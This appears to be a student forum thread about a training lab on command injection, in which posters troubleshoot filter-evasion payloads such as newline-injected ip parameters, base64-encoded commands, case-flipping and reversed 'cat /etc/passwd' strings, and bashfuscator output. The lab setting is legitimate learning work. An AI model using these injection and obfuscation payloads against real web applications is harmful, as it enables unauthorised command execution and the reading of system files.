Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1.
For this question I have encoded this command with base64 and included the decoding line within my payload but it just wont work, I do not get an invalid input but the output is just the result of the ping.
Any idea why my output is not showing? I have tried using $@ to seperate bash and base64 but I believe I do not need to as I am not getting an ‘invalid input’ shown.
I just found the answer, I was going wrong with what the question was asking. I did not understand that when it says “find /usr/share/ | grep root | grep mysql | tail -n 1” it meant that find was also within this set of commands and not just meaning find.
Remember to include find when encoding this otherwise you will end up like me looking stupid here haha, I hope this helps anyone in the future who has the same problem I have had.
I have problem with the same module but not in the last question. I cannot figure out how to do the exercise:
$(a="WhOaMi";printf %s "${a,,}")
Exercise: Can you test the above command to see if it works on your Linux VM, and then try to avoid using filtered characters to get it working on the web application?
I cannot figure out how to solve it with a semicolon, I however did manage with a newline. I tried ip=127.0.0.1%0a$(bash<<<"a='WhOami'{LS_COLORS:10:1}"'printf%09%25s%09"${a}"')
It works on my computer, but the server just returns the output of the ping command
I am having this issue as well. So far, I haven’t been able to get anything to run properly when created with bashfuscator.
Edit: the trick is to switch to bash before running bashfuscator.
It seems the tool assumes you’re already in bash (I spend most of my time in zsh)
After switching to bash before running it, I now have… probably 50% success with the generated payloads? Not too bad; definitely test them locally before trying them on a target!
If I set the tail command to just print the last line (per the lab’s instructions), only a newline is printed. This is apparent when printing the last N lines as well, however trying to give an answer of “new-line”, “\r”, “\n”, or “\r\n” is not considered the correct answer. The second-to-last line (which actually has text) is also not considered the correct answer.
Not sure if I am doing something incorrectly or if there is something wrong with the lab.
There are 3 workarounds for this. You either | rev | the commands or obfuscate the entire ‘find /usr/share/ | grep root | grep mysql | tail -n 1’ and read it with bash. Or obsfuscate ‘ls /usr/share’ at a time while you cd into the directories till you are at the last. cheers
I tried multiple payloads and none of them are working…
└──╼ [★]$ bash -c ‘eval “$(printf %s ‘dwssap/cte/ tac’|rev;)”’
tac|rev;)": -c: line 2: unexpected EOF while looking for matching `)’
└──╼ [★]$ bash -c ‘eval “$(qx=‘CAT /ETC/PASSWD’;printf %s “${qx~~}”)”’
/ETC/PASSWD;printf %s “${qx~~}”)": -c: line 2: unexpected EOF while looking for matching `)’
└──╼ [★]$ bash -c ‘bash <<< “$(YD1fn=(e a / w s c p \ t d);for YkcXID in 5 1 8 7 2 0 8 5 2 6 1 4 4 3 9;do printf %s “${YD1fn[$YkcXID]}”;done;)”’
bash: line 1: cad: command not found
└──╼ [★]$ bash -c ‘printf %s “$(rev <<<‘dwssap/cte/ tac’)”|$BASH’
tac)"|$BASH: -c: line 2: unexpected EOF while looking for matching `)’
